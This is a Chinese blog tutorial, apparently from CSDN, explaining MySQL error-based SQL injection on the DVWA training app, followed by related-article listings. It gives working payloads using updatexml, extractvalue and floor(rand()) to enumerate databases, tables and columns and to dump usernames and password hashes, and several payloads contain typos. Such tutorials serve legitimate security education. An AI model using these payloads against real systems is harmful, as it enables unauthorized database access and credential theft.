SQL报错注入原理与实战利用讲解

最新推荐文章于 2024-04-27 15:01:59 发布
最新推荐文章于 2024-04-27 15:01:59 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 渗透测试 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chen_zhangkonzhe/article/details/126832876
版权

报错注入攻击原理:

在这里插入图片描述
数据库提示错误是指,数据库在执行时,遇到语法不对,会显示报错信息,比如错误语句:select’
在这里插入图片描述
在公司开发项目是通常程序开发期间需要告诉使用者某些报错信息,方便程序员进行调试修复,定位文件错误,而且开发中会经常使用异常处理函数,捕获错误信息,比如在PHP中 使用mysql_error()函数。如果SQL注入存在时,会有报错信息返回就可以采用报错注入进行攻击啦!!!
在这里插入图片描述
在这里插入图片描述
该函数会报错SQL语句
在这里插入图片描述

报错注入攻击:

在用户可控的情况下去输入单引号,如果报错可能存在报错注入,如果拼接SQL语句带入到MySQL执行即在报错注入。
输入1’and info() 显示当前数据库,原理的sql 语句是:
select first_name,last_name from user where user_id = ‘1’ and info()–
会报错显示出当前的数据库不存在这个函数 这样当前库名就显示在页面
语句的意思是在数据中不存在info()的话就会报错,导致当当前库显示出来
在这里插入图片描述

报错注入获取数据库敏感信息:

输入我们构造好的攻击语句进行获取报错返回页面信息数据库
比如:http://192.168.0.115/01/vulnerabilities/sqli/?id=1%27and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))–+&Submit=Submit#
在这里插入图片描述
但是虽然采用了updatexml报错函数但是该函数只能显示32长度的内容,如果获取的内长度超过32则不会显示,然而这时候就需要使用字符串截取方法了,每次能够获取32个字符串的长度。
MySQL有很多函数支持报错:updatexml() ,floor(), extractvalue() linestring() multipolygon() poolygon() multion()等

黑盒测试报错注入:

首先需要获取当前数据库,通过数据库获取表名,接着通过表名获取字段,最后获取字段的数据内容。

报错注入得到库名:

1’ and info()–+
1’ and (updatexml()1,concatt(0x7e,(selectt user()),0x7e,1))–+
就跟前面讲的报错注入攻击一样,测试号后得到库名:dvwa

报错注入获取MySQL账号密码:

获取账号密码需要使用root用户有足够大的权限
select authentication_string from mysql.user limit 1;
在这里插入图片描述

报错注入获取表名:

通过MySQL内置库 information_schema 通过构造SQL语句查询获取表名采用floor报错并不会存在长度问题
查询第一个表名:
1’and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
需要获取第二个表名的话可以在加粗那修改
在这里插入图片描述

报错注入获取字段:

获取到表名就可以接着获取字段了
1’and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=‘users’ LIMIT 0,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
需要获取第二个字段的话可以在加粗那修改
在这里插入图片描述

报错注入获取段内容:

1’and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)–+
在这里插入图片描述
注意带号的

总结:
这次带领大家了解了SQL报错注入详细原理和实际利用,有喜欢的可以点个关注!
我会持续更新质量更好的文章,后面会推出在实战过程中挖掘漏洞技巧的专栏

**声明:**本作者所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本作者不承担相应的后果。

重生者安全
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
sql注入原理
m0_54525483的博客
07-22 1577
0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的渗透测试告中,出现最多的是xss(跨站脚本攻击)和明文传输等,但是对sql注入利用方式,也相对成熟,详细了解sql注入,可以参考之前的文章。http://wt7315.blog.51cto.com/10319657/1828167 今天主要分享下sql注入中的型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现而导致sql注入。 ...
Sql注入详解(原理篇)
Naive的博客
09-11 8358
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
注入是什么?一看你就明白了。注入原理+步骤+实战案例
最新发布
2401_84266286的博客
04-27 862
适用情况:页面有数据库的信息信息必须是动态的、来自数据库的信息。网站写死的、自定义的提示不算。
SQL注入原理-详细讲解 extractvalue()、updatexml()、floor() 的原因
大大大蜜蜂的博客
10-12 4985
SQL注入原理 一、xpath语法格式误的: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQL对extractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL注入之路之三:注入
weixin_62715196的博客
08-10 334
主要简述什么是注入注入常用函数,注入原理以及如何使用爆破注入获取用户敏感信息
SQL注入漏洞
gududeajun的博客
12-12 6601
SQL注入原理与解决方法代码示例
09-09
1. SQL注入原理: 当用户输入的数据未经验证或过滤直接拼接到SQL查询中时,攻击者可以通过输入特定的字符串来改变查询的逻辑。例如,通常的登录验证查询可能是这样的: ```sql SELECT * FROM users WHERE ...
SQL注入漏洞原理与防御.pdf
06-06
SQL注入漏洞原理与防御 漏洞介绍 SQL注入漏洞的本质是把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则。 SQL注入漏洞有两个关键条件,理解这两个条件可以帮助我们理解并防御SQL注入漏洞: 用户能...
sql注入讲解ppt.pptx
08-10
2. SQLi-Labs:SQL 注入的靶场,提供了不同知识点的题目,需要与 PHPStudy 结合使用。 3. Hackbar:写注入的 payload 的工具,大有用处。 4. Burpsuite:多功能的工具,可以写 payload 上传,也可以爆破。 四、...
sql注入原理及php防注入代码.doc
12-02
SQL注入原理及PHP防注入代码 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来...防止SQL注入需要了解SQL注入原理和防止SQL注入的方法,使用防注入函数和代码来防止SQL注入
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
sql注入攻击原理分析
08-26
sql注入攻击原理分析 sql注入攻击原理分析 sql注入攻击原理分析
sql注入基础原理注入方式
A906003660的博客
07-20 1127
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
SQL注入各种注入原理|绕过技巧|带实例详解|
BING
03-19 7744
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、注入攻击详解(注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
sql注入知识---注入
尘玥的故事
04-03 278
1 、通过floor , 注入语句如下: and select 1 from(select count() , concat(version() , floor(rand(0) 2)) x from information_schema . tables group by x) a);
SQL注入:floor注入的形成原理分析
Neonline254的博客
01-13 1064
进行SQL注入时,相信很多同学在遇到前端不回显时,会尝试SQL注入。常见的注入有:floor注入、updatexml注入和extractvalue注入等,不同于后两者利用Xpath解析误,floor注入的成因更加复杂。本文将详细地分析floor注入的成因,希望能对您有所帮助。
SQL注入实战注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1359
SQL注入实战注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
《WEB安全渗透测试》(3)SQL注入实战注入
午夜安全
10-02 994
《WEB安全渗透测试》(3)SQL注入实战注入 1)考虑使用注入URL:http://www.tianchi.com/web/error.php?username=1URL:http://www.tianchi.com/web/error.php?username=1'由于多了一个',SQL语句执行时会。而这里程序直接将误信息输出到了页面上,所以可以利用注入来获取数据。2)获取user()的值注入有多种格式,这里使用updatexml()函数,......
sql注入原理分析
JacobTsang的博客
10-13 1323
研究人员发现,使用group by子句结合rand()函数以及像count(*)这样的聚合函数,在SQL查询时会出现误,且误是随机产生的,这就产生了双重查询注入。 到底为什么floor()、rand(0)、count()、group by相结合,会产生这种误呢?转载以前乌云一位哥的文章: 种子值为0的rand()函数的输出几乎固定为01101 Okay let get is strai...
sql注入读取文件
05-22
注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些误的语法或者参数,从而导致数据库执行误,返回误信息。 如果攻击者成功利用注入技术读取了数据库中的敏感信息,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

重生者安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值